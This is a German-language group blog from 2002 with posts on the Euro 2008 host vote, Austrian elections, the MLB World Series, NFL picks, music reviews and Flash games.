    Im Laufe des Nachmittags des 12. Dezember entscheidet das UEFA-Exekutivkomitee in Nyon (Schweiz) über die Vergabe der Fußball-EM 2008.
    Noch am Vortag wird jedem Bewerber die Möglichkeit einer 15-minütigen Präsentation eingeräumt.

    Die Kandidaten:
    Österreich – Schweiz
    Griechenland – Türkei
    Irland – Schottland
    Dänemark - Schweden - Norwegen - Finnland
    Ungarn
    Russland
    Bosnien Herzegowina - Kroatien

    Die Wahlmodalitäten sind folgende:
    Der Bewerber mit der absoluten Mehrheit an Stimmen bekommt den Zuschlag. Sollte es im ersten Wahlgang keinem Bewerber gelingen die absolute Mehrheit an Stimmen zu erreichen, fällt der Bewerber mit den wenigsten Befürwortern weg und die Wahl wird wiederholt. Falls auch danach noch kein Bewerber die Mehrheit haben sollte, wird diese Prozedur so lange wiederholt, bis die endgültige Entscheidung gefallen ist.

    Die Spannung in den Bewerberländern steigt in den letzten Tage stetig an. Die besten Chancen werden laut unabhängigen Beobachtern den Kandidaten Irland/Schottland und Österreich/Schweiz gegeben.

    Aufsehen erregte Anfang dieser Woche ein von Lennart Johansson (Präsident der UEFA) gegebenes Interview, in dem er die Chancen Russlands (wegen der Geiselnahme in Moskau) und der Türkei und Griechenlands (wegen der Ausschreitungen beim
    UEFA-Cup Spiel zwischen Fenerbahçe Istanbul und Panathinaikos Athen) als sehr gering einschätzte.
    Da besagtes Interview zu heftigen Reaktionen in den betreffenden Ländern führte, schwächte Johansson schon am nächsten Tag seine Aussagen deutlich ab und versicherte allen Kandidatenländern, dass das Rennen um die Austragung der EURO 2008 immer noch offen sei, alle Bewerber die gleichen Chancen hätten und es ganz sicher zu einer rein sportlichen und nicht im geringsten politischen Entscheidung kommen werde.

    Trotzdem scheinen einige Kandidaten schon im Vorfeld schlechte Karten zu haben. Gegen die skandinavische Bewerbung spricht vor allem, dass viele Komitee-Mitglieder bezüglich der 4-Länder-Kandidatur skeptisch sind (weite Wege, Koordinationsprobleme, ...) und dass Schweden schon 1992 Gastgeber einer Fußball-EM war. Gegen die Bewerber aus Russland, Kroatien / Bosnien-Herzegowina, Griechenland / Türkei und Ungarn sprechen vor allem die finanziellen Rahmenbedingungen sowie die von Johansson angesprochenen Ereignisse. Die negativen Vorzeichen für die Schottland / Irland - Bewerbung sind vor allem hausgemacht. Während z.B. in Österreich die Zustimmung in der Bevölkerung mit 77% sehr hoch ist, sprachen sich diese Woche 68% der Schotten gegen die Bewerbung aus. Aus Irland ist zu hören, dass die erforderliche Anzahl der EM-tauglichen Stadien wahrscheinlich nicht gewährleistet werden kann. Gegen Schweiz / Österreich sprechen vor allem diverse Zuschauerausschreitungen wie zum Beispiel im Sommer beim Freundschaftsspiel zwischen dem SK Rapid und dem FC Arsenal in Eisenstadt und vor vier Wochen beim Bundsliga-Duell Austria Salzburg gegen SK Rapid in Salzburg-Lehen.

    Thomas Helbling (Projektleiter der schweizerisch-österreichischen Kandidatur):
    “Das Rennen ist nach wie vor völlig offen!"
    4  bully  13.03.2002 00:49:13
    3  bully  13.02.2002 00:06:44
    2  bully  13.01.2002 00:25:50
    1  bully  12.01.2002 10:32:03
    :: noch 8 monate!!!  bully  29.11.2002 17:35:57



    in ca. 8 monaten ist es in den USA soweit,
    TERMINATOR 3 kommt in die kinos!!!

    auf der website gibt es schon jetzt als kleinen vorgeschmack viele fotos, gimmicks und flash-animationen.

    den trailer gibts hier!!!
    :: mixed up  sTe  28.11.2002 13:16:04
    did you ever wanted to spend a day in someones mouth?

    Battleships comes to the web in this extremely classy online version of the classic game. suchtfaktor hoch !!!

    und beim C&A kann man wieder mit schilling zahlen :) (ueberhaupt kein rueckschritt...neeeeiin)
    :: HAPPY 21st BIRTHDAY, BARBARA & JENNA!!!  bully  25.11.2002 14:04:19

    auch um vom (für mich) nicht gerade erfreulichen wahlergebnis ein bisschen abzulenken, möchte ich hier den beiden töchtern des US-präsidenten zum heutigen 21. geburtstag gratulieren!!!

    endlich könnt ihr eure fake-IDs wegschmeissen und auch legal soviel tschechern, wie ihr wollt. ;-)))

    HAPPY BIRTHDAY, BARBARA (unten) AND JENNA (oben)!!!
    :: :(((  sTe  25.11.2002 12:57:57
    :: DANKE, ÖSTERREICH...  bully  24.11.2002 17:15:01


    :-(((
    :: patch  sTe  22.11.2002 10:14:01

    falls bei click auf diesen link etwas komisches passiert, sollte man ernsthaft ueberlegen auf die windows update seite zu gehen und sich den letzten secutity patch holen...
    :: dogs && guns != true  sTe  21.11.2002 23:11:19
    um an das unten angefuehrte posting zu den waffen anzuschliessen, und um die hunde aus ebendieser diskussion herauszuhalten, moechte ich auf ein viel gravierenderes problem der hundehaltung ablenken:
    dazu ein auszug aus dem artikel ´Gassi im Gossi´ (Falter 44/01, erschienen am 31.10.2001)
    "Beißt er?", ist die üblicherweise geäußerte Frage bei einer Begegnung mit frei laufenden Hunden. "Nein, er scheißt nur", wäre die passende Antwort des Besitzers, die aber nie zu hören ist. Denn der beste Freund des Menschen produziert je nach Rasse täglich zwischen einem achtel und einem halben Kilo der bekannten Stoffwechselendprodukte. Das ergibt bei 46.000 gemeldeten Hunden etwa 15 Tonnen Hundekot auf den Straßen und Parkanlagen Wiens. Täglich, wohlgemerkt"

    @hannes: ich weiss du bist ein menschenfreund und hundefeind. im direkten vergleich mit waffen jedoch, ist das eine ein ding und ´das´ andere ein lebewesen auf das man gefaehrlichkeit zurecht eher projeziert;
    tatsache ist, dass waffenschein ala schusswaffen fuer hunde nicht kontrollierbar ist, allein schon aus sicht der beurteilung...hundepsychologe?! oder doch eher psychologe fuern besitzer?!
    und wenn wir ehrlich sind: subjektive angst vor hunden hin oder her, gebissen wird kaum einer :)
    und um das posting abzurunden: viel aergerlicher als die tatsaechliche begegnung mit den vierbeinern ist doch die beruehrung mit deren absonderungen...

    PS: die hundstrümmerl-Info fuer alle dies besser machen wollen...
    :: kevin allein zu haus  bully  21.11.2002 22:34:47

    WOW!!! da hab ich doch glatt wieder was dazugelernt heute...
    nur wahre cineasten kennen also das grandiose filmische meisterwerk "Kevin allein zu Haus"!!! ahaaaa...
    danke herbert!!!!!!
    :: abseits vom wahlkampf  utility  21.11.2002 09:51:03
    gibt es auch noch politik. wer also für ein strengeres waffengesetz ist (und wer sollte nicht dafür sein, bitte?) kann ja mal dorthin schaun ... www.waffenweg.at
    :: wc 2006  sTe  20.11.2002 01:08:01
    ab heute ist das logo der fussball weltmeisterschft 2006 offiziell, auch die dazugehoerende website uebrigens;
    feelosophee meinung: mal was anderes,soviel ´humor´ traut man unseren deutschen freunden eigentlich gar nicht zu, ziemlich retro (puma und adidas in ihrer urspruenglichkeit lassen gruessen), alles im allem ansprechend...gratulation!
    (und das obwohls auch dem fiesling Blatter gefaellt...)

    :: gimmick of the month  sTe  19.11.2002 10:47:51
    warning! unless you have $750 laying around burning a hole in your pocket, don´t subject yourself to the torture of checking out the Draganflyer III website.
    I warned you...these videos will make you spend your money!

    DraganFlyer III

    now, if you happen to have about $5000 bucks laying around, you´d better have a look at the Draganflyer X-Pro.
    :: flush  sTe  19.11.2002 10:31:42
    introducing the Rocking Horse Toilet. bring a taste of the Wild West to your bathroom with this equine lavatory.

    And another rather weird game story can be read here: Peeball :)
    :: 11 o´clock tick tock - ein song verliert seine berechtigung...  bully  14.11.2002 10:39:18

    seit gestern nacht ist es soweit: die queen hat das seit dem ersten weltkrieg bestehende gesetz, das die generelle sperrstunde für alle bars, restaurants und pubs im uk für 23:00 uhr vorschreibt, aufgehoben!!!
    bravo!!!
    is ja auch wirklich mühsam, wenn man nach einem kino- oder theaterbesuch nirgends mehr auf a glaserl gehn kann ;-)
    :: FILMTIP ::  bully  14.11.2002 10:08:28

    BOWLING FOR COLUMBINE

    als schauspieler vor allem bekannt aus filmen wie "lucky numbers", "ed tv" und "fever pitch" versucht sich michael moore hier gleichzeitig auch als drehbuchautor und regisseur.
    sein film "bowling for columbine" war heuer nach 46 jahren der erste dokumentarfilm, der zum filmfestival nach cannes eingeladen wurde. dieses offensichtliche meisterwerk wurde mit standing ovations (20 minuten!!!) gewürdigt und erhielt einstimmig den spezialpreis der jury.

    was moore zeigt, ist wahr - keine szene ist nachgestellt. in seinem film zeigt er archivmaterial aus 50 jahren amerikanischer aussenpolitik, momentaufnahmen der amerikanischen alltagskultur und interviews mit waffenliebhabern.

    hab gerade in kulturzeit (3sat) einen bericht darüber gesehen und bin mir sicher, dass das ein film ist, den man sich einfach anschauen MUSS!!!

    kinostart in österreich: 28.11.
    :: sledge  sTe  11.12.2002 14:22:04
    awesome winter game...
    :: hools - sind wir echt schon so verrufen?  sTe  11.11.2002 13:38:53
    Wien/Salzburg - Rapid war einmal wer in der Hierarchie der Fußballer, heute, zwei Wochen vor der Nationalratswahl, kämpfen die Grünen darum, einfach nur mitspielen zu dürfen. Und das ist nicht nur ein billiger Witz über Partei und Fußball-Partie, das hängt auch mit dem Leben außerhalb des Vereins und der politischen Kaste zusammen. Rapids Fußballer verloren das Spiel in Salzburg 1:3, obwohl sie nicht schlechter spielten als die anderen, sie vergaben zu viele Chancen, Roman Wallner knallte einen Elfer an die Querlatte.
    Watschenfänger

    Doch die Mannschaft verlor ihre Würde nicht, gerade die aber wollten Salzburger Fans den Rapid-Anhängern rauben, sie wollten ein Rapid-Transparent entwenden, die Rapidler wehrten sich, 40 Salzburger und 25 Rapidler stürmten das Feld. Die Security versagte, die gewaltbereiten Fans prügelten sich kurz. Nicht weiter furchtbar. Aber die Rapid-Fans sind spätestens seit den (brutalen, dummen) Vorfällen in Eisenstadt für alle Brutalitäten auf Österreichs Spielfeldern die Watschenfänger. Damals ruinierten sie ein Freundschaftsspiel gegen Arsenal, das von den Eisenstädter Veranstaltern mit zu vielen Zusehern unter ungenügenden Sicherheitsvorkehrungen abgehalten wurde, und mit einer Provokation durch Einheimische und prügelnden Rapidlern endete.

    "Immer dabei"

    Nicht dass die gewaltbereiten Rapid-Fans Waserln oder Pazifisten sind, aber wer redet jetzt von den Salzburgern, die im Hanappi-Stadion eine Rakete in den Kindersektor schossen, die jüngst im Verteilerkreis aus dem Bus stürmten, Austrianer birnten und weiterfuhren. Oder vorher GAK-Anhänger auseinander nahmen. Bundesliga-Pressesprecher Christian Kircher kündigte gestern "Untersuchungen" an, die Rapid-Fans seien halt "immer bei den Ausschreitungen dabei".

    Direkter Zugriff

    Stimmt, leider sind sie nicht das einzige Problem, sonst wäre die Sache leicht lösbar. Seit Rapid-Präse Rudolf Edlinger ohne ausreichende Untersuchung die vermeintlichen Rädelsführer von Eisenstadt über die Medien verurteilte und mit Platzverbot belegte, schwappt die latente Unzufriedenheit mit der Intervention des Kapitals (Stronach bei der Austria) im geliebten Fußball hoch. Das ist zwar kein ein Grund, jemanden zu watschen, aber die Anhängerszene fürchtet, dass die von Frank Stronach geleitete Liga die Strukturen und Mittelsmänner, welche die gewaltbereiten Fans in einen Diskurs einbinden und so das (nicht wegzuleugnende) Gewaltpotenzial entschärfen, weghaben wollen, um direkten Zugriff von ganz oben nach ganz unten zu haben. Kircher: "Das stimmt nicht, wir wollen mit den Fanbeauftragten weiter arbeiten, aber sie sollen nicht mehr mit Presseakkreditierungen arbeiten, wir wollen einen eigenen Sektor für diese wichtigen Mittler schaffen." So entsteht aus dem schlagenden Schlamassel von Salzburg vielleicht doch noch eine Lösung für ein Problem, das die Liga nicht als solches sehen wollte. (DER STANDARD, Printausgabe, Montag, 11. November 2002, Johann Skocek)
    PRONG - review  romario11  11.09.2002 10:57:53
    einfach scheeeeehh!!!! die unangefochtenen meister des stakkatos.
    :: EU - Erweiterung Knittelfeld Style  utility  11.07.2002 16:03:15
    Und da soll noch wer sagen, die FPÖ wäre zu kritisch der Erweiterung der EU gegenüber eingestellt...www.tschuessel.at

    :: country  sTe  11.06.2002 18:27:32

    funtastic flash movie;
    particularly interesting for the country music lovers!

    check out also the cat bowling...

    CottAGE has a vast collection of classic computer games created between the 70s and the 90s emulated in Java which you can play online.
    :: mein tip!!!  bully  11.06.2002 13:25:35
    die tv-konfrontation von gestern hat mich noch sicherer gemacht:
    die fpö bleibt bei der kommenden nationalratswahl unter 10%!!!
    werdts schon sehn :-)))
    :: e-lection  sTe  11.06.2002 10:33:01
    mein kommerzieller beitrag zur wahl am 24. November: das wahlweb von wienweb,...
    kleines detail , das farbschema past sich den umfragewerten an, daher zur zeit ziemlich braun...
    :: NFL - Zwischenbilanz  bully  11.05.2002 16:31:47



    da ja jetzt in der NFL so circa halbzeit ist, haben wir beschlossen einmal kurz zwischendurch zwei expertentips ;-) bezüglich der playoff-kandidaten zu veröffentlichen.
    natürlich kann auch jeder andere interessierte gerne seine eigenen tips zum besten geben;
    hier sind jetzt jedenfalls mal unsre:

    Divisions:ali:bully:
    AFC EastDolphinsPatriots
    AFC NorthSteelersSteelers
    AFC SouthTitansTitans
    AFC WestBroncosChargers
    AFC Wildcard IChargersBroncos
    AFC Wildcard IIPatriotsRaiders
    NFC EastEaglesEagles
    NFC NorthPackersPackers
    NFC SouthSaintsBucs
    NFC West49ers49ers
    NFC Wildcard IBucsSaints
    NFC Wildcard IIFalconsRams

    wer im endeffekt recht oder öfter recht gehabt hat, werden wir ja dann so um weihnachten sehn ;-)

    tabellen
    :: surfer  sTe  11.05.2002 11:51:10

    another classic game nicely done in flash: donkey kong
    reminds me on my first game i did in 1985 for the commodore vc20 which also got listed in a magazine; remember typing off listings...? :)
    :: samma jetzt a a schurkenstaat???  bully  11.04.2002 19:44:18
    SN von heute (Haider trifft Saddam):
    Gegen Ende des Gesprächs habe Saddam die Dolmetscher hinaus geschickt, nur Außenminister Naji Sabri und Saddams Sicherheitschef seien im Raum geblieben. Haider: "Da hat Saddam Hussein erstens seine große Sympathie für Österreich bekundet und Außenminister Sabri angewiesen, dass er darauf achten muss, dass Österreich bei der Vergabe von Aufträgen prioritär behandelt wird."

    na hoffentlich is da irak ned bald das einzige land, aus dem ma nu aufträge bekommen... :-(((
    :: BIR, IKI, ÜTSCH - THEY ARE BACK!!!  bully  12.03.2002 00:05:31

    ab heute wieder jeden montag um 23:20 uhr auf pro7:
    ERKAN & STEFAN mit 14 neuen folgen von headnut.tv
    :: HAPPY 2nd BIRTHDAY FEELOSOPHEE  sTe  11.01.2002 14:48:35
    dr.feelo sagt danke an alle treuen leser, und verschreibt ein weiteres jahr bis zur totalen abhaengigkeit :)
    :: CASH FOREVER  sTe  11.01.2002 17:51:13

    wie der titel unschwer erkennen laesst, handelt es sich um den vierten streich in seiner American Recordings serie, und dieser ist mindestens so gut wie die vorangegangenen...

    das erste highlight ist das NIN cover ´hurt´ als zweiter track: allein der refrain ´And you could have it all; my empire of dirt´ aus johnnys kehle kann nicht passender und authentischer intoniert werden; wahrhaftig begeisternd!!!
    gespannt war ich vor der version von ´personal jesus´: und man wird nicht enttauescht: schleppender rythmus, gemixed mit barkeeper-piano grooved phantastisch...
    dann folgen neben eigenkompositionen mit trockensten texten, weitere covers, von ´desperado´ ueber ´bridge over troubled water´;
    alles zusammen vom feinsten...

    als musiker fungieren: keyboarder Benmont Tench und guitarist Michael Campbell (Tom Petty’s Heartbreakers), guitarist Smokey Hormel (Beck), Billy Preston, drummer Joey Waronker (R.E.M.), John Frusciante (Red Hot Chili Peppers);
    alles produziert natuerlich vom producer-god Rick Rubin!!!

    als fazit moechte ich nur meinen favourite song anfuehren: nick cave und johnny cash huldigen gemeinsam hank williams:´i´m so lonesome i could cry..´ wunderbar...

    und in anbetracht des leider totkranken zustandes von johnny cash wuensche ich ihm unbedingt eine fortsetzung der grandiosen serie ´American Recordings´...danke fuer dieses album!
    :: Jam Master Jay, 1965-2002  sTe  31.10.2002 15:14:24
    Legendary hip-hop DJ Jam Master Jay of Run-DMC was shot in the head and killed in Queens on Wednesday (October 30), according to police.

    Authorities confirmed that Jay, born Jason Mizell, was fatally shot inside a studio on Merrick Boulevard at 7:30 p.m. local time. Another victim, Urieco Rincon, was shot in the leg. Rincon, 25, is listed in stable condition at an area hospital.
    :: halloween  sTe  30.10.2002 12:30:34

    zitat aus einem online forum bezueglich halloween:
    "Wenn sich der Gusnbauer eine Batterielampe in sein Maul steckt mocht er den erstn Preis als Gruslkürbis" :)

    und in punkto verkehrssicherheit macht sich auch der arboe gedanken...

    wobei der katholische nachrichtendienst zu alternativen aufruft :)
    :: NOT IN OUR NAME  bully  28.10.2002 22:08:26
    nach der in den usa recht hohe wellen schlagenden ganzseitigen anzeige in der new york times am vergangenen donnerstag, in der prominente aus allen sparten gegen den krieg gegen den irak und weitere staaten auftreten, möcht ich dieser meiner meinung nach sehr guten aktion nun auch hier eine entsprechende plattform bieten.
    unterschrieben haben bis jetzt zum beispiel susan sarandon, oliver stone, martin luther king III., jane fonda, danny glover, martin sheen, terry gilliam, robert altman, laurie anderson, sally kirkland, ani di franco, brian eno, marisa tomei, jim jarmusch, zack de la rocha, tom morello und viele viele mehr.
    nachzulesen ist der genaue wortlaut des statements hier:
    deutsch / english
    weitere informationen und auch die möglichkeit das statement zu unterzeichnen gibt es hier.
    zukünftige geplante aktionen, kontaktmöglichkeiten und "The Pledge of Resistance" sind hier verfügbar.
    depressing...  sTe  28.10.2002 17:17:09
    ...jetzt wirds schon um 17 uhr finster :(
    feeloviewer v1.1  sTe  28.10.2002 16:27:08

    small facelifting for the feeloviewer ...
    :: we´ve been hacked  sTe  25.10.2002 11:44:01

    :: cube  sTe  24.10.2002 13:14:08

    Rubiks´s Cube in Flash. sure, its been done before, but never as nicely as this. whats more, its improved on the original by adding astronauts.
    würg...  romario11  23.10.2002 14:59:09
    wer ausser mir musste gestern abend in TV-Total zum zeugen einer musikalischen gotteslästerung ersten ranges werden? ein gewisser bela b. (die ärzte) hat mit der völlig völlig irrelevanten teenie punk combo Killer Barbies aus spanien ein duett gecovert vorgetragen. nun sollen ja "künstler" in ruhe gelassen werden und tun und lassen was sie wollen. aber mussten sie sich ausgerechnet "CANDY" vom IGGY aussuchen? eines meiner liebsten vom meister? noch dazu einfach schlecht nachgespielt und die jeweiligen originalstimmen einfach versucht zu imitieren (was schon am schlechten piefke-akzent von bela b. kläglich scheiterte...)? freunde, das war kein schöner anblick und jede sekunde schmerzte gewaltig. vom schock paralysiert konnte ich leider auch nicht wegschalten. ein albtraum.
    :: another launch  sTe  16.10.2002 23:05:53
    jetzt gehts schlag auf schlag: und mein naechstes projekt (privater natur) ist online: dotnetexperts.at;
    und diesmal bin ich nicht fuer die implementierung sondern allein fuers design und layout verantwortlich...

    worums geht steht hier..
    :: thiel relaunch  sTe  16.10.2002 01:24:16

    heute um ca 9.00 sollte unser neuestes werk, der relaunch der Thiel-Logistik website online gehen.

    meines erachtens wieder mal eine wirkliche ´nofrontiere´ site!!!

    den live switch werd ich nicht erleben, da ich zu diesem zeitpunkt auf der Austria .NET Conference weilen werde;

    nach 16 stündigen last-minute-fixes gewinnt ersteres an persoenlicher spannung;

    wird schon gut gehen :)

    ps: um noch eine pers. sentimentale bemerkung loszuwerden: unter dem menupunkt CORPORATE-->Management ist einer meiner geachtetsten spieler von austria salzburg zu finden. danke fuersti!!!
    :: friends again  sTe  14.10.2002 07:57:19
    vor 2 wochen ist die 9.season angelaufen, mitlerweile also schon 3 episodes erhaeltlich...
    jepa!!!
    :: raised  sTe  10.10.2002 19:57:19
    ...after 3 days of suffering ´grippaler infekt´, i´m somehow heading back for the good;
    saturday´s evening resume: thank you doris and hannes for the great food (pics here)

    my current october desktop
    :: MAJOR LEAGUE BASEBALL - PLAYOFFs 2002:  bully  10.07.2002 13:47:06




    super läuft das zur zeit alles :-)))
    die Yankees und die As scheiden schon in der ersten play-off-runde aus, seeehr schön!!! und auch der titelverteidiger (Diamondbacks) is schon draussen :-)))
    fehlt nur noch, dass die giants heute noch in atlanta gewinnen, hoffentlich schaffen barry bonds und seine kumpanen das!!! auch wenns wohl sehr schwer wird...
    YESSSSS!!! geschafft!!! war wiedermal ein feiner krimi!!! damit haben sich jetzt also wirklich in allen 4 partien die aussenseiter durchgesetzt!!!
    John Donovan: "Favorites falling like flyballs, home teams going home, defending champs left defenseless, Barry Bonds hitting home runs ... is this a real October or have we stepped into some alternative baseball universe?" (whole article)
    die semifinals (ab jetzt best-of-seven!) lauten also:

    Anaheim Angels @ Minnesota Twins
    San Francisco Giants @ St. Louis Cardinals

    (schedule-zeitplan)

    und jetzt: GO GIANTS!!! GO ANGELS!!!
    mögen die beiden wildcard-teams in die WORLD SERIES kommen!!!

    jawoi!!! die giants schaffen gleich im ersten spiel (9:6) das erste "break" (auswärtssieg)!!!
    auch die angels haben heute auswärts gewonnen (6:3) und können jetzt (theoretisch) mit drei heimsiegen in folge schon alles klarmachen!!! :-))
    (nur kurz zur erklärung: die vereine mit der besseren saisonstatistik (twins und cardinals) haben in der best-of-seven-serie zuerst zwei heimspiele, dann drei auswärtsspiele, dann wieder zwei heimspiele, wenn nötig. das heimrecht in den world series wechselt jedes jahr zwischen american league und national league; heuer hat die american league - der linke zweig - den heimvorteil.)

    AUSGEZEICHNET!!! die anaheim angels haben meinen vorschlag (3 heimsiege in folge) offensichtlich gelesen und für gut befunden und ziehen mit dem heutigen sieg (13:5) als american league - champion in die world series ein.
    ich gratuliere herzlich!!!!!!
    noch dazu waren sie heute in der mitte des 7. innings schon 5:3 zurück, haben dann aber 10 runs in einem einzigen halbinning nach hause gebracht... very impressing, guys!!! das war in einem play-off-spiel bislang nur den philadelphia athletics (1929) und detroit tigers (1968) geglückt!
    und damit erreichen sie das erste mal überhaupt die world series!!!

    jetzt fehlt nurnoch, dass die giants heute die cardinals besiegen und auf 3:1 stellen. und genau so ist es letzte nacht auch gekommen. die "hasenfuß-taktik" nicht gegen barry bonds zu pitchen ihm intentional walks zu geben und ihn damit automatisch auf 1st base zu schicken um nach ihm gegen benito santiago und j.t. snow zu pitchen is voll in die hose gegangen, denn genau diese beiden haben je 2 runs nach hause gebracht (bonds war logischerweise jedesmal dabei) und somit den 4:3 - sieg herausgeholt :-)))
    John Donovan: "These playoffs belong to Bonds. The greatest athlete in team sports today is just a step away from the games biggest showcase. One more win and Bonds, after 17 years as arguably the best player ever to pull on a batting helmet, will play in his first World Series. For a guy who owns the sport, it seems only fitting." (whole article)
    ein sieg heute noch für die giants und wir hätten heuer wirklich eine premiere, denn noch nie in der 99-jährigen geschichte der world series bestritten die beiden wildcard - teams das finale!!!
    let the magic october continue!!!

    JAAAAAAA!!!!!!!! GESCHAFFT!!!!!!!!!!
    mit einem unglaublich spannenden 2:1-sieg zogen die giants heute nacht in die world series ein!!! durch einen RBI-single von kenny lofton mit dem allerletzten bat schaffen die giants, was auch ich ihnen im 8. (vorletzten) inning ehrlichgesagt nicht mehr zugetraut hätte; nämlich heute schon den einen noch nötigen sieg einzufahren. das letzte mal standen die giants 1989 in den world series, als sie mit 4:0 gegen die oakland as untergingen. den einzigen world champion title holten sie 1954, also vor sage und schreibe 54 jahren!!!

    noch vor 4 wochen kämpften die angels und die giants um den einzug in die play-offs (wir berichteten exklusiv: californian races ;-) ) und jetzt stehen beide unglaublicherweise im finale. suuuuper, gratuliere!!!!!!!

    ein einziges mal gewann bis jetzt ein wildcard-team die world series (die florida marlins, 1997). damals schon dabei, ein junger, unerfahrener aber phantastisch werfender pitcher namens livan hernandez (bruder des yankees-pitchers orlando "el duque" hernandez). er wurde vor fast genau fünf jahren auch völlig verdient zum mvp dieser world series gewählt. eben dieser livan hernandez (photo) spielt nun seit dem jahr 2000 bei den giants und hat also jetzt die möglichkeit ein zweites mal mit einem wildcard-team die world championship zu holen.

    und nun lasset die Hi-Five Series (benannt nach dem interstate highway number five, der anaheim und san francisco verbindet) beginnen!!! oder von mir aus auch Wild, Wild-Card West World Series ;-)
    wie alle leser schon mitbekommen haben, sind mir beide final-teams sehr sympathisch, aber jetzt (sorry angels!!!) kanns (auch wenn ihr wohl wieder aussenseiter seid) nur heissen:
    GO GIANTS!!!
    da ja in der nacht von morgen (sa.) auf übermorgen nun endlich die world series beginnen - wer hätte gedacht, dass beide championship series schon nach fünf partien entschieden sind - , gibts hier jetzt einen direkten teamvergleich, position für position von stephen cannella.

    predictions:
    stephen canellas vorhersage: angels in seven games
    john donovans vorhersage: angels in six
    meine vorhersage: giants in six ;-)))
    quoten diverser wettbüros:
    betandwin.com: giants: 2,05 / angels: 1,80
    intertops.com: giants: 2,12 / angels: 1,82
    interwetten.com: giants: 1,95 / angels: 1,75
    willhill.com: giants: 2,00 / angels: 1,83

    noch 27 stunden bis zum ersten pitch; bin schon sooo gspannt; ein auswärtssieg gleich im ersten spiel, wär fast zu schön um wahr zu werden!!!!

    hier noch kurz vor beginn die gegenüberstellung der beiden stadien:

    -------------------------------------------------------------------------------------

    WORLD SERIES:

    GAME ONE:
    JAAAAAAAAAAAAAAAAA!!!!!!!!!!
    starkes homerunning beider teams (barry bonds, reggie sanders und j.t. snow auf seiten der giants; zwei mal troy glaus auf seiten der angels) und ein makelloses pitching der giants bescheren san francisco einen traumstart in die world series.
    der einzige "grosse" unterschied der beiden teams in einer von anfang bis ende sehr spannenden begegnung: der two-run homer von j.t. snow im sechsten inning.
    allerdings hat mich der hpu (home plate umpire) manchmal echt narrisch gemacht, so dubiose entscheidungen hat der da gestern gegen die giants getroffen.
    natürlich ist damit noch nichts enschieden; die angels haben heuer in allen playoff-series (zuerst gegen die yankees, danach gegen die twins) das erste spiel verloren und dann alle weiteren gewonnen. ein weiterer sieg der giants heute nacht in anaheim würde allerdings wohl schon eine kleine vorentscheidung bedeuten...
    wir können gespannt sein!!!

    GAME TWO:
    wahnsinnsspiel, unglaublich!!!!!!!!!
    dusty baker (manager der giants):
    "It was one of the best games I have ever been in!"
    "Solch ein Spiel mit so viel Dramatik hat es ganz sicher nur selten in der World Series gegeben. Es war unglaublich und wunderschön zugleich, denn nun beginnt die Serie eigentlich wieder von vorn", meinte Salmon. (orf-on)
    noch nie in der 99-jährigen geschichte der world series hat eine heimmannschaft ein spiel noch verloren, in dem sie nach einem inning (neuntel des spiels) mit mehr als drei punkten vorsprung geführt hat. leider war es auch diesmal nicht so weit, aber die möglichkeit war wohl so gross wie noch nie.
    nach dem ersten inning führten die angels schon mit 5:0 und die befürchtung, dasses eine fade partie wird, war gross, aber unbegründet, denn so ca. 20 minuten später stand es schon 5:4.
    hier jetzt für euch mal die diversen zwischenstände von heute nacht:
    5:0 / 5:4 / 7:4 / 7:9 / 9:9 / 11:9 / 11:10
    war echt soooo heftig!!!
    hier jetzt alle homeruns, RBIs, walks usw. der diversen spieler aufzuzählen wär wohl sinnlos und spar ich mir auch, der entscheidende 2-run-homerun für die angels wurde von tim salmon erziehlt. und als die angels im 9. inning das erste mal wirklich gegen barry bonds gepitcht haben und ihn nicht absichtlich auf base schicken wollten, hat er ihn auch gleich zum 11:10 in die zuschauer befördert; der ausgleich sollte aber nicht mehr fallen.
    Tim Salmon gushed about the home run - not his, the one by Barry Bonds. "That was the farthest ball I have ever seen hit in this ballpark, for sure," he said. ;-)
    schade, aber irgendwie passt das schon. hätten die giants gestern gewonnen, wär die serie womoglich nach 4 spielen zu ende gewesen.
    heute findet kein spiel statt, es ist reisetag und der ganze tross macht sich auf den weg ins 600km nördliche san francisco, wo ab dienstag nacht die nächsten 3 partien stattfinden werden.
    ich lehn mich jetzt mal etwas weit aus dem fenster und prognostiziere folgendes:
    zwei dieser drei heimspiele gewinnen die giants, damit gehts am freitag beim stand von 3:2 für die giants zurück nach anaheim. und eines dieser zwei spiele gewinnen die giants dann noch. irgendwie läufts stark auf einen dramatischen spielverlauf hinaus. könnt also leicht sein, dass wir nächsten sonntag ein spiel 7 bekommen... :-))))

    jetzt mal zwischendurch ganz was anderes, vielleicht kann mir ja wer weiterhelfen...
    vor dem spiel singt irgendwer die amerikanische hymne und genau bei der letzten note ("braaaves") fliegt ein stealth-fighter geschwader übers stadion.
    mich würd echt interessieren, wie die das immer soooo genau hinbekommen.
    machen die sich vorher a exakte zeit aus (nach dem motto: du, sängerin, du musst genau um 7:50 uhr beim letzten ton sein und dann fliegen wir drüber) oder haben die wirklich den ton von der übertragung auf ihren kopfhörern und timen das dann so genau??? oder ganz anders?

    GAME THREE:
    ojeojeoje...
    giants:
    defensiv äusserst schwache leistung!
    offensiv katastrophale leistung!!! (vom 5. inning mal abgesehen: solo home run von rich aurelia und two-run home run von barry bonds)
    angels:
    offensiv grandiose leistung!!! kein homerun dafür aber phantasisches small ball. jede position schlägt singles und doubles nach belieben, dazu noch einige walks und stolen bases. zwei mal hintereinander (3. und 4. inning) kamen alle 9 spieler der angels ans schlagmal. das gabs noch nie in den world series!!!
    defensiv waren sie kaum gefordert, was zu tun war, erledigten sie solide.
    das einzige positive für die giants:
    mit seinem homerun im 5. inning (siehe bild rechts) stellte barry bonds neuerlich 2 all-time records auf:
    er ist der erste spieler, der in seinen drei ersten world series games jeweils mindestens einen homerun schlägt.
    ausserdem ist er jetzt auch der erste spieler in der mlb überhaupt, der in den playoffs in einer einzigen saison sieben homeruns schlägt.
    ich bin mir aber sicher, dass alle giants inkl. bonds gerne auf diese rekorde verzichtet hätten, hätten sie heute stattdessen gewonnen... :-(
    nach vier innings stand es bereits 8:1 für die angels; da konnte auch giants-fan robin williams nurnoch den kopf schütteln und fluchend wie ein rohrspatz auf seinem platz herumspringen... ein wahres aufbäumen der giants war heute nicht zu sehen, die gebotene leistung war auch eindeutig zu schwach dafür. die der angels hingegen überwältigend stark.
    ein gaaanz klar verdienter sieg der angels. alle achtung!!!
    eines ist jetzt aber auch fix:
    die giants MÜSSEN die nächsten beiden spiele unbedingt gewinnen!!! sonst seh ich schwarz...
    wenn die angels aber heute nacht wieder so heiss sind, ist das wirklich seeeehr schwer bis unmöglich :-(

    GAME FOUR:
    YESSSSSSSSSSSSSS!!!!!
